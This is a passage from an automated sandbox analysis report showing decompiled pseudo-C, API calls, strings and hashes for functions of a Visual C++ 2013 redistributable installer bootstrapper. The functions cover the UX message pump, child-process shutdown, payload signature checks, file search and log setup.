							E01281566(2, 0x20000004, E01291879( *((intOrPtr*)(_t77 + 0x18))));
							 *((intOrPtr*)(_t77 + 0x18)) = 1;
						}
					} else {
						_push("Failed to load UX.");
						goto L2;
					}
				} else {
					_push("Failed to create engine for UX.");
					L2:
					_push(_t34);
					E012AFA86();
					L18:
				}
				E0128BAFC(_t77 + 0xb8);
				_t46 = _v12;
				if(_t46 != 0) {
					 *((intOrPtr*)( *_t46 + 8))(_t46);
				}
				return _v8;
			}

0x0128176d
0x0128176e
0x01281778
0x01281786
0x01281789
0x0128179b
0x012817a0
0x012817a5
0x012817c5
0x012817ca
0x012817cd
0x012817cf
0x012817d8
0x012817e1
0x012817e4
0x012817e7
0x012817e9
0x0128180f
0x01281816
0x01281818
0x0128181a
0x00000000
0x00000000
0x01281802
0x01281805
0x01281867
0x0128186a
0x0128186f
0x01281874
0x00000000
0x01281807
0x0128180a
0x00000000
0x0128180a
0x00000000
0x01281805
0x0128181f
0x012817eb
0x012817eb
0x012817f0
0x012817f1
0x012817f1
0x012817f7
0x01281825
0x01281825
0x0128182e
0x01281831
0x01281834
0x0128187a
0x0128187d
0x0128187f
0x01281884
0x01281886
0x0128188e
0x00000000
0x0128188e
0x01281836
0x01281846
0x0128184e
0x0128184e
0x012817d1
0x012817d1
0x00000000
0x012817d1
0x012817a7
0x012817a7
0x012817ac
0x012817ac
0x012817ad
0x01281894
0x01281895
0x0128189d
0x012818a2
0x012818aa
0x012818af
0x012818af
0x012818b6

APIs

PeekMessageW.USER32 ref: 01281789
GetCurrentThreadId.KERNEL32 ref: 0128178F
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01281816

Strings

Failed to create engine for UX., xrefs: 012817A7
Failed to start bootstrapper application., xrefs: 012817EB
Unexpected return value from message pump., xrefs: 0128186F
engine.cpp, xrefs: 01281862
Failed to load UX., xrefs: 012817D1

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp
API String ID: 673430819-3216346975
Opcode ID: e0ab28314a184f272e4ad35b7761b0739863a64ee23018c98688683c3568a171
Instruction ID: 7d958884bb50d3f36eb8722bec2b626ffe4b4af4752ce22d83782b9318172d9f
Opcode Fuzzy Hash: e0ab28314a184f272e4ad35b7761b0739863a64ee23018c98688683c3568a171
Instruction Fuzzy Hash: E64191B1922206AFEB10FBA4DCC9EBE77B8AB14314F204429F506E71C0D675A9568760

Uniqueness

Uniqueness Score: -1.00%

Function 012837BE Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E012837BE(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				signed int _t29;
				intOrPtr _t36;
				void* _t37;
				signed int _t48;

				_t39 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t48 = E012B2845( &_v12,  &_v8, _a8);
				if(_t48 >= 0) {
					_t48 = E012B2845( &_v12,  &_v8, _a12);
					if(_t48 >= 0) {
						_t36 = _a4;
						_t25 =  *((intOrPtr*)(_t36 + 0x14));
						if( *((intOrPtr*)(_t36 + 0x14)) == 0xffffffff) {
							L8:
							_t48 = E01282F42(_t39, _t48,  *((intOrPtr*)(_t36 + 0x10)), 0xf0000003, _v12, _v8);
							if(_t48 >= 0) {
								_t37 =  *(_t36 + 0xc);
								if(_t37 != 0 && WaitForSingleObject(_t37, 0x2bf20) == 0xffffffff) {
									_t29 = GetLastError();
									if(_t29 > 0) {
										_t29 = _t29 & 0x0000ffff | 0x80070000;
									}
									_t48 = _t29;
									if(_t48 >= 0) {
										_t48 = 0x80004005;
									}
									E012B294E(_t29, "pipe.cpp", 0x25b, _t48);
									_push("Failed to wait for child process exit.");
									goto L17;
								}
							} else {
								_push("Failed to post terminate message to child process.");
								goto L17;
							}
						} else {
							_t48 = E01282F42(_t39, _t48, _t25, 0xf0000003, _v12, _v8);
							if(_t48 >= 0) {
								goto L8;
							} else {
								_push("Failed to post terminate message to child process cache thread.");
								L17:
								_push(_t48);
								E012AFA86();
							}
						}
					} else {
						_push("Failed to write restart to message buffer.");
						goto L4;
					}
				} else {
					_push("Failed to write exit code to message buffer.");
					L4:
					_push(_t48);
					E012AFA86();
				}
				return _t48;
			}

0x012837be
0x012837c1
0x012837c2
0x012837c3
0x012837c7
0x012837dc
0x012837e0
0x012837f9
0x012837fd
0x01283812
0x01283815
0x01283821
0x0128383d
0x0128384c
0x01283850
0x01283859
0x0128385e
0x01283871
0x01283879
0x01283880
0x01283880
0x01283885
0x01283889
0x0128388b
0x0128388b
0x0128389b
0x012838a0
0x00000000
0x012838a0
0x01283852
0x01283852
0x00000000
0x01283852
0x01283823
0x01283830
0x01283834
0x00000000
0x01283836
0x01283836
0x012838a5
0x012838a5
0x012838a6
0x012838ac
0x01283834
0x012837ff
0x012837ff
0x00000000
0x012837ff
0x012837e2
0x012837e2
0x01283804
0x01283804
0x01283805
0x0128380b
0x012838b3

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,00000000,?,00000000,00000000,01281E12,00000000,00000000,?,?), ref: 01283866
GetLastError.KERNEL32(?,?,?,01281AC0,?,?,00000000,?,?,00000000,?,?,?,?,?,00000001), ref: 01283871

Strings

Failed to post terminate message to child process., xrefs: 01283852
Failed to write exit code to message buffer., xrefs: 012837E2
Failed to wait for child process exit., xrefs: 012838A0
pipe.cpp, xrefs: 01283896
Failed to write restart to message buffer., xrefs: 012837FF
Failed to post terminate message to child process cache thread., xrefs: 01283836

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: 159e711b7ae9cba39da88a86c27d673aedf530941c77fc12a8d618ee522efacf
Instruction ID: 6253726fa498e221bc8e3dadb9a9cb57e61fe9b2d1e5da88477eef4094e159b6
Opcode Fuzzy Hash: 159e711b7ae9cba39da88a86c27d673aedf530941c77fc12a8d618ee522efacf
Instruction Fuzzy Hash: 1921C933972716FBDB12AA95CC85EDE7B68BF14B70F100265FA10B72D0D6B4D9108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01299124 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E01299124(void* __ebx, void* __ecx, void* __edx, intOrPtr* __esi, WCHAR* _a4) {
				void* _v8;
				void* __edi;
				void* _t16;
				signed int _t24;
				void* _t28;
				void* _t32;
				signed int _t34;
				intOrPtr* _t36;

				_t36 = __esi;
				_t32 = __edx;
				_t28 = __ebx;
				_push(__ecx);
				_t34 = 0;
				_t16 = CreateFileW(_a4, 0x80000000, 5, 0, 3, 0x8000000, 0);
				_v8 = _t16;
				if(_t16 != 0xffffffff) {
					L7:
					if( *((intOrPtr*)(_t36 + 0x20)) == 0) {
						if( *((intOrPtr*)(_t36 + 0x1c)) == 0) {
							L13:
							_t17 =  *((intOrPtr*)(_t36 + 0x30));
							if( *((intOrPtr*)(_t36 + 0x30)) == 0) {
								L17:
								if(_v8 != 0xffffffff) {
									CloseHandle(_v8);
								}
								L19:
								return _t34;
							}
							_t34 = E01297D07(_t28, _v8, _t32, _t34, _t36, _t17,  *((intOrPtr*)(_t36 + 0x34)), _a4);
							if(_t34 >= 0) {
								goto L17;
							}
							_push( *_t36);
							_push("Failed to verify hash of payload: %ls");
							L16:
							_push(_t34);
							E012AFA86();
							goto L17;
						}
						_t34 = E01297E2A(_a4, _t32, _t36, _v8);
						if(_t34 >= 0) {
							goto L13;
						}
						_push( *_t36);
						_push("Failed to verify catalog signature of payload: %ls");
						goto L16;
					}
					_t34 = E01298A1A(_t32, _t36, _a4, _v8);
					if(_t34 >= 0) {
						goto L13;
					}
					_push( *_t36);
					_push("Failed to verify signature of payload: %ls");
					goto L16;
				}
				_t24 = GetLastError();
				if(_t24 > 0) {
					_t24 = _t24 & 0x0000ffff | 0x80070000;
				}
				_t34 = _t24;
				if(_t34 != 0x80070003 && _t34 != 0x80070002) {
					if(_t34 >= 0) {
						goto L7;
					}
					E012B294E(_t24, "cache.cpp", 0x52a, _t34);
					E012AFA86(_t34, "Failed to open payload at path: %ls", _a4);
				}
			}

0x01299124
0x01299124
0x01299124
0x01299127
0x01299129
0x0129913e
0x01299144
0x0129914a
0x012991a1
0x012991a5
0x012991c6
0x012991e3
0x012991e3
0x012991e8
0x0129920f
0x01299213
0x01299218
0x01299218
0x0129921e
0x01299222
0x01299222
0x012991f9
0x012991fd
0x00000000
0x00000000
0x012991ff
0x01299201
0x01299206
0x01299206
0x01299207
0x00000000
0x0129920c
0x012991d4
0x012991d8
0x00000000
0x00000000
0x012991da
0x012991dc
0x00000000
0x012991dc
0x012991b3
0x012991b7
0x00000000
0x00000000
0x012991b9
0x012991bb
0x00000000
0x012991bb
0x0129914c
0x01299154
0x0129915b
0x0129915b
0x01299160
0x01299168
0x0129917c
0x00000000
0x00000000
0x01299189
0x01299197
0x0129919c

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,?,?,012995E8,00000000,?,?,00000000,?), ref: 0129913E
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0129914C

Part of subcall function 01297E2A: _memset.LIBCMT ref: 01297E54

CloseHandle.KERNEL32(000000FF,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000), ref: 01299218

Strings

cache.cpp, xrefs: 01299184
Failed to verify signature of payload: %ls, xrefs: 012991BB
Failed to open payload at path: %ls, xrefs: 01299191
Failed to verify catalog signature of payload: %ls, xrefs: 012991DC
Failed to verify hash of payload: %ls, xrefs: 01299201

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_memset
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 1470872789-2757871984
Opcode ID: bd45830719fc03b8b573ebad45c6e53d9707a6e95b209ffe29050bf0c621468c
Instruction ID: 88fd274e712365307838fe4986dddb7874f58c3c2774f80ad16bdf44a035cb2a
Opcode Fuzzy Hash: bd45830719fc03b8b573ebad45c6e53d9707a6e95b209ffe29050bf0c621468c
Instruction Fuzzy Hash: F82155326A0202FBDF334A6CCC09F6E3A66AF84734F20021CFA0466260E7758681DF61

Uniqueness

Uniqueness Score: -1.00%

Function 012875AD Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E012875AD(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4) {
				WCHAR* _v8;
				signed int _t14;
				signed int _t21;
				signed int _t27;
				void* _t33;
				intOrPtr* _t34;
				signed int _t36;

				_t34 = __edi;
				_t33 = __edx;
				_t27 = 0;
				_v8 = 0;
				_t36 = E01288C14(_a4,  *((intOrPtr*)(__edi + 0x14)),  &_v8, 0);
				if(_t36 >= 0) {
					_t14 = GetFileAttributesW(_v8);
					__eflags = _t14 - 0xffffffff;
					if(_t14 != 0xffffffff) {
						__eflags = (_t14 & 0x00000010) - 0x10;
						if((_t14 & 0x00000010) != 0x10) {
							_t27 = 1;
							__eflags = 1;
						}
						L14:
						asm("cdq");
						_t36 = E0128A6F5(_a4,  *((intOrPtr*)(_t34 + 4)), _t27, _t33, 0);
						__eflags = _t36;
						if(_t36 >= 0) {
							L17:
							if(_v8 != 0) {
								E012B01E8(_v8);
							}
							return _t36;
						}
						_push("Failed to set variable.");
						L16:
						_push(_t36);
						E012AFA86();
						goto L17;
					}
					_t21 = GetLastError();
					__eflags = _t21 - 2;
					if(_t21 == 2) {
						L11:
						_push(_v8);
						E012AF6A2(2, "File search: %ls, did not find path: %ls",  *_t34);
						goto L14;
					}
					__eflags = _t21 - 3;
					if(_t21 == 3) {
						goto L11;
					}
					__eflags = _t21;
					if(__eflags == 0) {
						goto L14;
					}
					if(__eflags > 0) {
						_t21 = _t21 & 0x0000ffff | 0x80070000;
						__eflags = _t21;
					}
					_t36 = _t21;
					__eflags = _t36;
					if(_t36 >= 0) {
						_t36 = 0x80004005;
					}
					E012B294E(_t21, "search.cpp", 0x28d, _t36);
					E012AFA86(_t36, "Failed get to file attributes. \'%ls\'",  *((intOrPtr*)(_t34 + 0x14)));
					goto L17;
				}
				_push("Failed to format variable string.");
				goto L16;
			}

0x012875ad
0x012875ad
0x012875b3
0x012875bd
0x012875c8
0x012875cc
0x012875db
0x012875e1
0x012875e4
0x0128764d
0x0128764f
0x01287653
0x01287653
0x01287653
0x01287654
0x01287658
0x01287666
0x01287668
0x0128766a
0x01287679
0x0128767d
0x01287682
0x01287682
0x0128768c
0x0128768c
0x0128766c
0x01287671
0x01287671
0x01287672
0x00000000
0x01287678
0x012875e6
0x012875ec
0x012875ef
0x01287634
0x01287634
0x01287640
0x00000000
0x01287645
0x012875f1
0x012875f4
0x00000000
0x00000000
0x012875f6
0x012875f8
0x00000000
0x00000000
0x012875fa
0x01287601
0x01287601
0x01287601
0x01287606
0x01287608
0x0128760a
0x0128760c
0x0128760c
0x0128761c
0x0128762a
0x00000000
0x0128762f
0x012875ce
0x00000000

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 012875C3
GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,01288B70,?,?,?,?,?,?), ref: 012875DB
GetLastError.KERNEL32(?,01288B70,?,?,?,?,?,?,?,?,00000001,00000000), ref: 012875E6

Strings

Failed get to file attributes. '%ls', xrefs: 01287624
search.cpp, xrefs: 01287617
Failed to set variable., xrefs: 0128766C
File search: %ls, did not find path: %ls, xrefs: 01287639
Failed to format variable string., xrefs: 012875CE

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: 7f74b68fded4763cd76359baa1cf65b3f2ca9ff7346b9b44df0f3eae2346f5c4
Instruction ID: f30a82fb0385ed26aaf3b8b3e07af8613ed3c34e03475e4ec530f3361ad391a5
Opcode Fuzzy Hash: 7f74b68fded4763cd76359baa1cf65b3f2ca9ff7346b9b44df0f3eae2346f5c4
Instruction Fuzzy Hash: DF212972973226BEEB123AAC8C86AFD7E25DF21394F240164FB00A11D0D775DD1096E1

Uniqueness

Uniqueness Score: -1.00%

Function 01291EFD Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 222
sleepCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01291EFD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				intOrPtr* _v16;
				signed char _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t68;
				intOrPtr _t70;
				intOrPtr _t76;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t87;
				char _t95;
				void* _t107;
				intOrPtr* _t109;
				intOrPtr* _t111;
				signed char* _t113;
				intOrPtr* _t115;

				_t107 = __edx;
				_push(__ebx);
				_t109 = _a4;
				_t95 = 0;
				_t2 = _t109 + 8; // 0x9
				_t113 = _t2;
				_v8 = 0;
				_v12 = 0;
				E01291BBB(0, __ecx, _t113);
				_t58 =  *_t113;
				_t100 = _t58 & 0x00000002;
				if(_t100 != 0 || (_t58 & 0x00000004) != 0) {
					if((_t58 & 0x00000004) == 0) {
						if(_t100 == _t95) {
							goto L7;
						} else {
							_push(_t95);
							_push(3);
							goto L6;
						}
					} else {
						_push(_t95);
						_push(4);
						L6:
						E012AFA1A();
						L7:
						_t9 = _t109 + 0xc; // 0xd
						_t100 = _t9;
						_t59 =  *_t9;
						if(_t59 == _t95 ||  *_t59 == _t95) {
							_t60 =  *((intOrPtr*)(_t109 + 0x10));
							if(_t60 == _t95 ||  *_t60 == _t95) {
								E012B2086(_t100, _t107, _t95, L"Setup", _t95, L"log", _t100, _t95);
							}
						}
						goto L12;
					}
				} else {
					L12:
					_t11 = _t109 + 0xc; // 0xd
					_t62 = _t11;
					_v16 = _t62;
					_t63 =  *_t62;
					if(_t63 == _t95 ||  *_t63 == _t95) {
						_t64 =  *((intOrPtr*)(_t109 + 0x10));
						if(_t64 == _t95 ||  *_t64 == _t95) {
							E012AF07F();
							goto L37;
						} else {
							_t80 = E01291D5C( &_v12, _t107);
							_v8 = _t80;
							if(_t80 >= 0) {
								_t37 = _t109 + 0xc; // 0xd
								_t82 = E012AF8AB(_t100, _t107, _v12,  *((intOrPtr*)(_t109 + 0x10)), 0,  *((intOrPtr*)(_t109 + 0x14)), 0, 0, _t37);
								_v8 = _t82;
								if(_t82 >= 0) {
									 *_t109 = 1;
									_t95 = 0;
									goto L38;
								}
								E012AF07F();
								_v8 = 0;
								_t95 = 0;
								L37:
								 *_t109 = 2;
								goto L38;
							}
							_push("Failed to get non-session specific TEMP folder.");
							_push(_t80);
							E012AFA86();
							_t95 = 0;
							goto L52;
						}
					} else {
						_a4 = _t95;
						_t76 = E012B6B16(_t100,  &_v12);
						_v8 = _t76;
						if(_t76 >= _t95) {
							do {
								if(_a4 > _t95) {
									Sleep(0x7d0);
								}
								_t100 =  *_t113 & 0x00000001;
								_t87 = E012AF8AB( *_t113 & 0x00000001, _t107, _v12,  *_v16, _t95, _t95,  *_t113 & 0x00000001, _t95, _v16);
								_v8 = _t87;
								if(( *_t113 & 0x00000001) != 0 && _t87 == 0x80070020) {
									_a4 = _a4 + 1;
								}
							} while (_a4 > _t95 && _a4 <= 3);
							if(_t87 >= _t95) {
								 *_t109 = 1;
								L38:
								if( *_t109 != 1) {
									L52:
									if(_v12 != _t95) {
										E012B01E8(_v12);
									}
									return _v8;
								}
								_t43 = _t109 + 0xc; // 0xd
								_t115 = _t43;
								_t68 = E012B190E( *_t115);
								_a4 = _t68;
								if(_t68 == _t95 ||  *_t68 == _t95) {
									_t50 = _t109 + 0x10; // 0x11
									_t70 = E012B1171(_t100, _t107, _t50,  *_t115, _t95);
									_v8 = _t70;
									if(_t70 >= _t95) {
										goto L49;
									}
									_push("Failed to copy full log path to prefix.");
									_push(_t70);
									goto L48;
								} else {
									_t103 =  *_t115;
									_t45 = _t109 + 0x10; // 0x11
									_t76 = E012B1171( *_t115, _t107, _t45,  *_t115, _t68 -  *_t115 >> 1);
									_v8 = _t76;
									if(_t76 >= _t95) {
										_t48 = _t109 + 0x14; // 0x15
										_t76 = E012B1171(_t103, _t107, _t48, _a4 + 2, _t95);
										_v8 = _t76;
										if(_t76 >= _t95) {
											L49:
											_t111 =  *((intOrPtr*)(_t109 + 4));
											if(_t111 != _t95 &&  *_t111 != _t95) {
												E0128A734(_a8, _t111,  *_t115, _t95);
											}
											goto L52;
										}
										_push("Failed to copy log extension to extension.");
										L45:
										_push(_t76);
										L48:
										E012AFA86();
										goto L52;
									}
									_push("Failed to copy log path to prefix.");
									goto L45;
								}
							}
							E012AF07F();
							 *_t109 = 2;
							if(( *_t113 & 0x00000001) == 0) {
								_t117 = _v8;
								_v8 = 0x80070656;
								E01295F7E(_t100, _t107, _a12, _a16, 0x80070656);
								if(_v8 >= _t95) {
									goto L38;
								}
								E012AFA86(_t117, "Failed to open log: %ls",  *_v16);
								goto L52;
							}
							_v8 = _t95;
							goto L38;
						}
						_push("Failed to get current directory.");
						goto L45;
					}
				}
			}

0x01291efd
0x01291f03
0x01291f06
0x01291f09
0x01291f0b
0x01291f0b
0x01291f0e
0x01291f11
0x01291f14
0x01291f19
0x01291f1d
0x01291f20
0x01291f28
0x01291f31
0x00000000
0x01291f33
0x01291f33
0x01291f34
0x00000000
0x01291f34
0x01291f2a
0x01291f2a
0x01291f2b
0x01291f36
0x01291f36
0x01291f3b
0x01291f3b
0x01291f3b
0x01291f3e
0x01291f42
0x01291f49
0x01291f4e
0x01291f63
0x01291f63
0x01291f4e
0x00000000
0x01291f42
0x01291f68
0x01291f68
0x01291f68
0x01291f68
0x01291f6b
0x01291f6e
0x01291f72
0x0129203d
0x01292042
0x012920a0
0x00000000
0x01292049
0x0129204c
0x01292053
0x01292058
0x0129206e
0x0129207e
0x01292083
0x01292088
0x01292096
0x0129209c
0x00000000
0x0129209c
0x0129208a
0x0129208f
0x01292092
0x012920a5
0x012920a5
0x00000000
0x012920a5
0x0129205a
0x0129205f
0x01292060
0x01292067
0x00000000
0x01292067
0x01291f81
0x01291f85
0x01291f88
0x01291f8d
0x01291f92
0x01291f9e
0x01291fa1
0x01291fa8
0x01291fa8
0x01291fb5
0x01291fc0
0x01291fc8
0x01291fcb
0x01291fd4
0x01291fd4
0x01291fd7
0x01291fe4
0x01292035
0x012920ab
0x012920ae
0x01292143
0x01292149
0x0129214e
0x0129214e
0x01292157
0x01292157
0x012920b4
0x012920b4
0x012920b9
0x012920be
0x012920c3
0x0129210c
0x01292110
0x01292115
0x0129211a
0x00000000
0x00000000
0x0129211c
0x01292121
0x00000000
0x012920ca
0x012920ca
0x012920d2
0x012920d6
0x012920db
0x012920e0
0x012920f1
0x012920f5
0x012920fa
0x012920ff
0x0129212b
0x0129212b
0x01292130
0x0129213e
0x0129213e
0x00000000
0x01292130
0x01292101
0x01292106
0x01292106
0x01292122
0x01292122
0x00000000
0x01292128
0x012920e2
0x00000000
0x012920e2
0x012920c3
0x01291fe6
0x01291fee
0x01291ff4
0x01291ffe
0x0129200a
0x01292010
0x01292017
0x00000000
0x00000000
0x01292028
0x00000000
0x0129202d
0x01291ff6
0x00000000
0x01291ff6
0x01291f94
0x00000000
0x01291f94
0x01291f72

APIs

Part of subcall function 01291BBB: RegCloseKey.ADVAPI32(?,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001,?,?,?,01291F19,00000000,?,?,?), ref: 01291C48

Sleep.KERNEL32(000007D0,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000,?,?,?), ref: 01291FA8

Strings

Failed to copy log extension to extension., xrefs: 01292101
Failed to get current directory., xrefs: 01291F94
Failed to copy log path to prefix., xrefs: 012920E2
Failed to get non-session specific TEMP folder., xrefs: 0129205A
Failed to open log: %ls, xrefs: 01292022
Setup, xrefs: 01291F5D
log, xrefs: 01291F57
Failed to copy full log path to prefix., xrefs: 0129211C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$log
API String ID: 2834455192-2818506709
Opcode ID: f89f7d7c72525ee313614911a99eaf38de7d32c932063481cc283fbbfbad50e9
Instruction ID: 687ca048433697a83351ada73a5413fb15c05dbead8c04a039bbfb2a2783b6aa
Opcode Fuzzy Hash: f89f7d7c72525ee313614911a99eaf38de7d32c932063481cc283fbbfbad50e9
Instruction Fuzzy Hash: 7271C5B193020BFFDF21AFA8CD809BDBBB9EF14354B604529E705A7111D3709AA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012AF727 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E012AF727(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v528;
				short _v1048;
				char _v1052;
				struct HINSTANCE__* _v1056;
				struct HINSTANCE__* _v1060;
				long _v1064;
				signed int _t25;
				long _t29;
				unsigned int _t40;
				unsigned int _t42;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t54;
				void* _t55;
				void* _t56;
				char* _t58;
				void* _t63;
				void* _t68;
				intOrPtr _t70;
				void* _t71;
				void* _t73;
				void* _t74;
				void* _t75;
				signed int _t76;
				void* _t77;

				_t68 = __edx;
				_t25 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t25 ^ _t76;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t70 =  *0x12d4ef8; // 0x12d0b94
				_v1064 = 0x104;
				_v1056 = 0;
				_v1060 = 0;
				_v1052 = 0;
				_t29 = GetModuleFileNameW(0,  &_v528, 0x104);
				_t73 = 0x208;
				if(_t29 == 0) {
					E012A7E30( &_v528, 0, 0x208);
					_t77 = _t77 + 0xc;
				}
				if(E012B5C53( &_v528,  &_v1056,  &_v1060) < 0) {
					_v1056 = 0;
					_v1060 = 0;
				}
				if(GetComputerNameW( &_v1048,  &_v1064) != 0) {
					L7:
					E012B7E46(_t70, _t83,  &_v1052, 0);
					_push(_v1052);
					_push("=== Logging started: %ls ===");
					_t74 = 2;
					_push(_t74);
					E012AF6A2();
					_t40 = _v1060;
					_push(_t40 & 0x0000ffff);
					_push(_t40 >> 0x10);
					_t42 = _v1056;
					_push(_t42 & 0x0000ffff);
					_push(_t42 >> 0x10);
					E012AF6A2(_t74, "Executable: %ls v%d.%d.%d.%d",  &_v528);
					E012AF6A2(_t74, "Computer  : %ls",  &_v1048);
					_t48 =  *0x12d4ef4; // 0x3
					_t49 = _t48;
					if(_t49 == 0) {
						_t70 =  *0x12d4f0c; // 0x12d0b68
					} else {
						_t54 = _t49 - 1;
						if(_t54 == 0) {
							_t70 =  *0x12d4efc; // 0x12d0b8c
						} else {
							_t55 = _t54 - 1;
							if(_t55 == 0) {
								_t70 =  *0x12d4f00; // 0x12d0b80
							} else {
								_t56 = _t55 - 1;
								if(_t56 == 0) {
									_t70 =  *0x12d4f04; // 0x12d0b78
								} else {
									if(_t56 == 1) {
										_t70 =  *0x12d4f08; // 0x12d0b70
									}
								}
							}
						}
					}
					E012AF6A2(_t74, "--- logging level: %hs ---", _t70);
					_pop(_t71);
					_pop(_t75);
					_pop(_t63);
					if(_v1052 != 0) {
						E012B01E8(_v1052);
					}
					return E012A7EAA(0, _t63, _v8 ^ _t76, _t68, _t71, _t75);
				} else {
					_t58 =  &_v1048;
					do {
						 *_t58 = 0;
						_t58 = _t58 + 1;
						_t73 = _t73 - 1;
						_t83 = _t73;
					} while (_t73 != 0);
					goto L7;
				}
			}

0x012af727
0x012af730
0x012af737
0x012af73a
0x012af73b
0x012af73c
0x012af73d
0x012af749
0x012af759
0x012af75f
0x012af765
